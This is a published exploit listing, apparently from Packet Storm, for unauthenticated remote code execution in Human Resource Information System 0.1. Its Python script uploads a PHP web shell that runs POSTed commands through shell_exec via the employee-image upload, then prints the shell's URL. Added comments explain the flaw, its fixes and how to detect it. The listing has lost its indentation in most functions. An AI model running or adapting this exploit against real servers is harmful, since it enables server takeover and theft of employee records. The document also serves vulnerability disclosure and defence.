## https://sploitus.com/exploit?id=PACKETSTORM:162496
# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)  
# Date: 04-05-2021  
# Exploit Author: Reza Afsahi  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html  
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code  
# Version: 0.1  
# Tested on: PHP 7.4.11 , Linux x64_x86  
  
############################################################################################################  
  
# Description:  
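# The web application's employee-creation endpoint accepts a file upload without authentication. As the proof of concept below shows, a .php file is accepted as the employee image and is then reachable under the web path, which can result in Remote Code Execution on the server.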
  
############################################################################################################  
  
# Proof of concept:  
  
#!/usr/bin/python3  
  
import requests  
import sys  
from bs4 import BeautifulSoup  
  
# Looks for the uploaded file on the employee page and prints its URL.
# Fetches <domain>/Admin_Dashboard/Add_employee.php, parses the HTML with
# BeautifulSoup and scans the src of every <img> tag for the substring
# "shell.php". Nothing is returned; the result is only printed.
#
# NOTE(review): indentation was lost in this listing, so the nesting below
# (in particular whether the final `else` pairs with the `if` or with the
# `for`) cannot be confirmed. The code is left exactly as published.
#
# Defender note: the request carries no cookies or credentials, so the PoC
# presumes this page and the image paths it lists are readable without a
# session -- confirm against the application. The URL printed below is built
# under /Admin_Dashboard/, which suggests uploads are stored inside the web
# root. Storing uploads outside the document root, or disabling script
# execution in the upload directory, removes the step this function relies on.
def find_shell(domain):  
req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")  
soup = BeautifulSoup(req_2.content , "html.parser")  
imgs = soup.find_all("img")  
for i in imgs:  
src = i['src']  
# The match is a plain substring test on the stored image path.
if ("shell.php" in src):  
print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")  
break  
else:  
continue  
  
# Sends the multipart POST that demonstrates the unrestricted upload.
# Posts the employee form fields in `d` plus one file part (`f`) to
# <domain>/Admin_Dashboard/process/addemployee_process.php, and calls
# find_shell(domain) when the response is HTTP 200 and its body contains
# "Insert Successfully". Nothing is returned.
#
# NOTE(review): indentation was lost in this listing, so it cannot be
# confirmed whether the final `else` pairs with the status-code check or with
# the "Insert Successfully" check. The code is left exactly as published.
#
# Defender notes, grounded in the request built below:
#   * No cookie, token or Authorization header is sent, which is what
#     "unauthenticated" means for this endpoint. The handler should reject
#     requests that lack a valid admin session.
#   * The file part is named employee_image, has filename shell.php and a
#     declared type of application/x-php. The PoC treats the upload as
#     accepted, so the server side should allow-list image extensions, verify
#     the content, and generate its own stored file name.
#   * Detection: a POST to addemployee_process.php whose multipart filename
#     ends in .php, followed by requests to a .php file in the image
#     directory carrying a `cmd` form field.
def upload_file(domain):  
  
print("\n [!] Uploading Shell . . .")  
# The uploaded body is an HTML form plus PHP that passes the POSTed `cmd`
# value to shell_exec() and echoes the output.
payload = """   
<!DOCTYPE html>  
<html>  
<head>  
<title> Shell </title>  
</head>  
<body>  
<form action="#" method="post">  
<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">  
<br><br>  
<input type="submit" name="submit" value="execute">  
</form>  
<?php   
$cmd = $_POST['cmd'];  
$result = shell_exec($cmd);  
echo "<pre>{$result}</pre>";  
  
?>  
</body>  
</html>  
"""  
  
# `h` is defined but never passed to requests.post() below; requests builds
# the multipart Content-Type header itself when `files=` is given.
h = {  
"Content-Type" : "multipart/form-data"  
}  
  
# requests file tuple: (filename, content, content type, extra part headers).
f = {'employee_image':('shell.php',payload,  
'application/x-php', {'Content-Disposition': 'form-data'}  
)  
}  
# Placeholder employee record; every value is filler chosen by the PoC author.
d = {  
"emplo" : "",  
"employee_companyid" : "test",  
"employee_firstname" : "test",  
"employee_lastname" : "test",  
"employee_middlename" : "test",  
"branches_datefrom" : "0011-11-11",  
"branches_recentdate" : "2222-11-11",  
"employee_position" : "test",  
"employee_contact" : "23123132132",  
"employee_sss" : "test",  
"employee_tin" : "test",  
"employee_hdmf_pagibig" : "test",  
"employee_gsis" : "test"  
}  
url = domain + "/Admin_Dashboard/process/addemployee_process.php"  
req = requests.post(url , data=d , files = f)  
# Success is inferred from the status code and a marker string in the body.
if req.status_code == 200:  
if ("Insert Successfully" in req.text):  
print("\n [!] Shell uploaded succefully\n")  
find_shell(domain)  
  
else:  
print("Exploit Failed 1")  
  
def main():
    """Check the command line, print the banner and start the upload check.

    Expects exactly one argument, the base URL of the application. With any
    other argument count it prints two usage lines and exits with status -1.
    """
    argv = sys.argv
    if len(argv) != 2:
        usage_templates = (
            '[!] usage: %s <target url> ',
            '[!] eg: %s http://vulndomain.com',
        )
        for template in usage_templates:
            print(template % argv[0])
        sys.exit(-1)

    rule = "<><><><><><><><><><><><><><><><><><><><><><><><>"
    banner = (
        rule,
        "<> Human Resource Information System <>",
        "<> Shell Uploader <>",
        rule,
    )
    for line in banner:
        print(line)

    # The single positional argument is passed on unchanged as the base URL.
    upload_file(argv[1])
  
# Run main() only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()